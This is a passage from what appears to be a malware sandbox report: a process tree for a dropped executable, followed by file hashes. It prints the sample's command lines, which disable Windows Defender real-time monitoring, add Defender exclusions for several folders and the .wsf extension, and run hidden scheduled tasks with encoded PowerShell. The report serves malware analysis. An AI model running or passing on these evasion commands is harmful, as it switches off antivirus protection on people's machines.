  [2] C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe Fi /nTsite_idiTD 385118 /S
      PID: 1544
      - Executes dropped EXE
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /CREATE /TN "guivFWLjr" /SC once /ST 02:18:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        (the -EncodedCommand value is base64 of UTF-16LE text and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force)
        PID: 1128
        - Creates scheduled task(s)
    [3] C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /run /I /tn "guivFWLjr"
        PID: 2872
    [3] C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /DELETE /F /TN "guivFWLjr"
        PID: 1720
    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
        PID: 2272
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
          PID: 296
          - Modifies Windows Defender Real-time Protection settings
    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
        PID: 992
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
          PID: 1072
          - Modifies Windows Defender Real-time Protection settings
    [3] C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /CREATE /TN "gqVzEotUY" /SC once /ST 05:55:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        (same encoded payload as guivFWLjr: start-process -WindowStyle Hidden gpupdate.exe /force)
        PID: 1644
        - Creates scheduled task(s)
    [3] C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /run /I /tn "gqVzEotUY"
        PID: 1400
    [3] C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /DELETE /F /TN "gqVzEotUY"
        PID: 2568
    [3] C:\Windows\SysWOW64\forfiles.exe
        Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
        (same proxy chain as under Install.exe, now matching on cmd.exe and excluding the .wsf extension ahead of the script dropped below)
        PID: 2596
      [4] C:\Windows\SysWOW64\cmd.exe
          Command line: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
          PID: 2080
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
            PID: 2836
            - Drops file in System32 directory
            - Modifies data under HKEY_USERS
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\SysWOW64\Wbem\WMIC.exe
              Command line: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
              PID: 2844
              - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:32
        PID: 2684
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:32
          PID: 588
          - Windows security bypass
    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:64
        PID: 1940
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:64
          PID: 2664
          - Windows security bypass
    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:32
        PID: 2380
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:32
          PID: 2396
    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:64
        PID: 2344
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:64
          PID: 2692
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\HbtuuClNkkkdGbCN\ShwGpVFp\TDpbxBctojdmUTHz.wsf"3⤵PID:2708
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\HbtuuClNkkkdGbCN\ShwGpVFp\TDpbxBctojdmUTHz.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2724 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:3040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hdPjkOXNzukcsjVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hdPjkOXNzukcsjVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:324⤵PID:2264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:644⤵PID:2092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:324⤵PID:2680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:644⤵PID:2028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:324⤵PID:2992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:644⤵PID:976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:324⤵PID:1324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:644⤵PID:912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:324⤵PID:2800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:644⤵PID:532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hdPjkOXNzukcsjVB" /t REG_DWORD /d 0 /reg:324⤵PID:1504
-
-
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hdPjkOXNzukcsjVB" /t REG_DWORD /d 0 /reg:64
(depth 4) PID:1668
-
-
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
(depth 4) PID:2212
-
-
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
(depth 4) PID:1768
-
-
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga" /t REG_DWORD /d 0 /reg:32
(depth 4) PID:2972
-
-
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga" /t REG_DWORD /d 0 /reg:64
(depth 4) PID:836
-
-
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:32
(depth 4) PID:1628
-
-
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:64
(depth 4) PID:1488
-
-
-
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ghvOphcQH" /SC once /ST 10:40:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
(the -EncodedCommand value is base64 of UTF-16LE text and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force)
(depth 3)
- Creates scheduled task(s)
PID:2556
-
-
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ghvOphcQH"
(depth 3) PID:2564
-
-
-
C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe
C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe Fi /nTsite_idiTD 385118 /S
(depth 2)
- Executes dropped EXE
PID:2204
-
-
C:\Windows\system32\taskeng.exe
taskeng.exe {DB64E25A-720D-4AE0-9237-1EC01284555D} S-1-5-21-2461186416-2307104501-1787948496-1000:MGILJUBR\Admin:Interactive:[1]
(depth 1)
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
(depth 2)
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
(depth 3) PID:1724
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
(depth 2)
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1904 -
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
(depth 3) PID:2064
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
(depth 2)
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2912 -
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
(depth 3) PID:700
-
-
-
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
(depth 1) PID:2956
-
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
(depth 1) PID:1520
-
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
(depth 1) PID:2856
Network
MITRE ATT&CK Enterprise v15
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB
MD5
8b144f11a703b9e766160e3bafbbc607
SHA1
dc876639ea0ef392d2fab5eb37b479b3fdaee69b
SHA256
6d3fd8c7abc601a51dd7388bc9ce08a537ee1a3ded2cb7bf2e8629411243c257
SHA512
5eb369ab05061f60a451761682a9019b1c2679d301644eca117a0c7a6ed8a6885ebb5c56b9eb58a478b076b1c0da8b48ff891a31f6f3d4102d7e19b5a8f2e31e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SBPNCSW8ZEUXHX7HD8U6.temp
Filesize
7KB
MD5
f7b92e0e114a027ae162589e196f8844
SHA1
7fadcb83884257a2026239cd17141a811eb50aed
SHA256
818e9d082dc23539aa3e4013f093907e01d87d04227269e318901a9a0a9088d0
SHA512
dee9843c71948618156772e54b8f146991e6431ed6becb7c61e0295e01daacec7dbcaa60177d651748b72fc589285aeb405598fe094c66e3b2605b1ab1ce8000
-
Filesize
9KB
MD5
44f92e47f7bbac6796287e09f4a58d27
SHA1
036350d24e0b64a0977c22d3367f79c18d86eeed
SHA256
d43581eea4cac88f4cfc4e5a1634f96984e5cb9e43c7e9fbc56a96b5caa3eb84
SHA512
558b66bbcaaa71e444654bd5d26c51854d5b4c3d6ee937b64db9b72d80754e2d75194f67ffd213a28be5602a816f2fb4ae620547e8af7b0601e36e83659e2ebf
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
6.7MB
MD5
0a35bbd6448122353a2d8ea91cff5781
SHA1
742ec335853eba4e5b41200fa46958328e90cb2f
SHA256
ccc5f37eb38a137f33f8f0d603f88f178056a9c576c316f6a366727e07c9a0bb
SHA512
5c4dbc03b3c43ddea27bb6df56e5e317c64237018e325a84b257847e4223f0c3302f10b9ab5956ef7e197c237f7d346fbddbb7ee06856b42314cc0b85f300b8f